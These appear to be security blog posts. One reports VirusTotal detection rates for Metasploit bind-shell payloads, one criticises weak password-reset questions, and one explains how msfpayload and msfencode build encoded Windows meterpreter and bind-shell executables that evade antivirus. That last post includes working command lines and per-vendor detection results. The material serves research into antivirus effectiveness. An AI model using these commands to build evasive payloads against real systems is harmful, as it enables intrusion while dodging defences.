Here are some numbers from submitting them to www.virustotal.com:

Bindshell = 3/37

Bindshell + countdown = 6/37

Bindshell + Shikata_na_gia encoding = Detected by 6/37

Bindshell + countdown encoding + Shikata_na_gia encoding = Detected by 6/37

I'll talk about this some more at my SANS CDI talk.

Worst cognitive password?

Cognitive passwords are those questions your bank and other accounts have you setup so that you can reset your password or verify your identity if you have forgotten your password.   I personally am not a big fan of these.   If forced to implement a solution based on these I would go with several "In the Wallet" questions.   Questions that would require the individual pull something from there wallet to answer the question.   Things like:

"What are the last 6 digits of your library card number?" 

"What is the last name of the issuer of your fitness club card?" 

"What is the last 6 digits on your favorite Shopping club card?"

If you use these types of questions you have to give the user many choices.   Not everyone has a shopping club card  or a library card, so a broad set of questions works best.   The goal of coming up with the questions should be to have answers that can not be easily guessed or looked up on the internet.   Here are some examples of horrible questions.

Looked up with some simple information about the user:

"So Sarah Palin, where did you meet your spouse?"

"What is your voting precinct or district?"

Easily brute forced or guessed:

"What is your favorite baseball team?"   Guess what 80% of the people in Atlanta say.

"What is your favorite color?"   Come on, who isn't madly in love with one of the primary colors?

The last category of question that suck is those tha only a few possible answers that could be right.   Today I renewed by subscription to a prominent computer SECURITY magazine that asked me, "How many siblings do you have?"  With the exception of a few families we can pretty much rule out anything greater than 4.  And all of those families have their own discovery channel show, so we know their answers.   The best I can hope for is that my answer wont be brute-forced in the first 5 attempts!

Summary:  Avoid cognitive passwords if you can.  If you have to use them, be very careful with the questions you choose.

Metasploit updates to msfencode and exe template

HD Moore and the team at Metasploits are constantly updating the framework.    The programs, scripts and approaches I document In my  SANS paper on the Effectiveness of Antivirus in Detecting Metasploit Payloads have changed significantly.     If you haven't read my paper you may find it interesting.  Its here

In the document I showed how an attacker can create standalone executable payloads of any of the available payloads in the framework.  I showed how to you can use msfencode to alter the payload to avoid detection by antivirus.   One difficulty at the time was that msfencode didn't make an executable.   That all changed on 9-26!  HDM make the some changes to both the template that is used by msfpayload and msfencode (among other things).  It now much easier to avoid antivirus.  Now msfencode will create an EXE!   It doesn't show up in the options when you do msfencode -h but it works! So the following:

./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -t exe

will encode the standalone meterpreter with the default encoder Shikata_ga_nai.   It works great!!  REMEMBER: msfencode wants machine language code as input (RAW output from msfpayload)   If you tell msfpayload to generate an EXE then pipe that to msfencode, msfencode will encode the Win32 PE headers and you end up with binary that will not run.  Give msfencode C source code and it will produce encoded C source code.  But that source code won't run and better than the unecoded one.    msfencode needs RAW input.  msfencode will also generate RAW output, so you should  be able to chain multiple payload encodes.  This works great too!

# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/fnstenv_mov -t raw | ./msfencode -t exe > doubleencoded.exe 

[*] x86/fnstenv_mov succeeded, final size 342

[*] x86/shikata_ga_nai succeeded, final size 369

UPDATE:  I have been unable to reproduce this result again.    Encoding binaries a second time has resulted in corruption. I'm not sure what I did wrong last night.   I probably tested my single encoded binary thinking it was my double encoded.  

Things have change quite a bit since february.   A straight payload with no encoding is detected by 3 antivirus products, Avast, AVG and GData.   But none of them detect it as a metasploit payload.  Instead they detect a generic "dropper".  These are NOT the same antivirus products that detected payloads back in february.  Those two products (Kasperski and Webgateway) don't detect anything now.  Seems we are relying on dumb luck    

Unencoded payload is detected by 3 antivirus products, Avast, AVG and GData 

Single encoded (shikata_ga_nia) is detected by 3 antivirus products, Avast, AVG and GData

Double encoded (fnstenv_mov + shikata_ga_nia) is detected by 1 Antivirus product, AVG

Additionally HD changed the template that is used.   When msfpayload and msfencode create an executable they rather elegantly do a merge of the payload text with the binary /data/template.exe.   HD change the template to make it more difficult for antivirus to detect the payloads.  It now stores the payloads in the .rdata section rather than the .data section and employes some techniques to avoid detection.   

Lets pretend for a minute that antivirus was able to detect the payloads BEFORE these changes.   That task just got a whole lot harder for the antivirus vendors. 

Pauldotcom.com did some some similar work on metasploit payloads in September of this year.  Check out his stuff here.